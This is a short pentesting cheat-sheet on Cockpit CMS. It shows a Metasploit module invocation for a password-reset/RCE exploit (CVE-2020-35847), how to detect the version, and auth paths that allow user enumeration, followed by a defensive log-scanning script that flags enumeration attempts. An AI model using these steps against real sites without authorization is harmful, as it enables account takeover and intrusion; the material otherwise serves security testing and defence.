# Cockpit CMS Pentesting

Cockpit CMS is a content management system for publishing content.

### Enumeration & Remote Code Execution (RCE) & Reverse Shell <a href="#enumeration-remote-code-execution-rce-reverse-shell" id="enumeration-remote-code-execution-rce-reverse-shell"></a>

```
# Reset password (CVE-2020-35847)
msf> use exploit/multi/http/cockpit_cms_rce
msf> set USER admin
msf> run
```

### Version Detection <a href="#version-detection" id="version-detection"></a>

The Cockpit CMS version is exposed as the value of the `data-version` attribute on the `<html>` tag.

```
<html lang="en" data-base="/" data-route="/" data-version="0.11.1" data-locale="en">
```

### Common Directories <a href="#common-directories" id="common-directories"></a>

```
/auth/check # Users can be enumerated through this path
/auth/forgotpassword
/auth/index
/auth/login
/auth/requestreset # Users can be enumerated through this path
```
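
A defender-side check for the two enumeration paths listed above, as an added example that is not part of the original page: it counts requests per client IP to `/auth/check` and `/auth/requestreset` in a web access log and flags clients at or above a threshold. The combined log format, the threshold, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Paths the page lists as usable for user enumeration.
ENUM_PATHS = ("/auth/check", "/auth/requestreset")

# Assumed input: common/combined access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

def match_enum_path(raw_path):
    """Return the enumeration path a request hits, or None.
    Strips the query string and trailing slash; suffix matching also
    covers installs served under a base path such as /cockpit."""
    path = raw_path.split("?", 1)[0].rstrip("/")
    for enum_path in ENUM_PATHS:
        if path.endswith(enum_path):
            return enum_path
    return None

def enumeration_suspects(lines, threshold=3):
    """Return {ip: {path: count}} for clients whose total hits on the
    enumeration paths reach the threshold (threshold is an assumed value)."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        enum_path = match_enum_path(m["path"])
        if enum_path:
            hits[m["ip"]][enum_path] += 1
    return {ip: dict(paths) for ip, paths in hits.items()
            if sum(paths.values()) >= threshold}

def _line(ip, path):
    # Builds one constructed sample log line (not real traffic).
    return f'{ip} - - [10/Jan/2024:10:00:00 +0000] "POST {path} HTTP/1.1" 200 64'

SAMPLE_LOG = (
    [_line("198.51.100.7", "/auth/check")] * 3
    + [_line("198.51.100.7", "/auth/requestreset")]
    + [_line("192.0.2.10", "/auth/check")]            # single normal login
    + [_line("203.0.113.5", "/cockpit/auth/requestreset?x=1")] * 3
    + ["not an access log line"]
)

if __name__ == "__main__":
    for ip, paths in enumeration_suspects(SAMPLE_LOG).items():
        print(ip, paths)
```
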
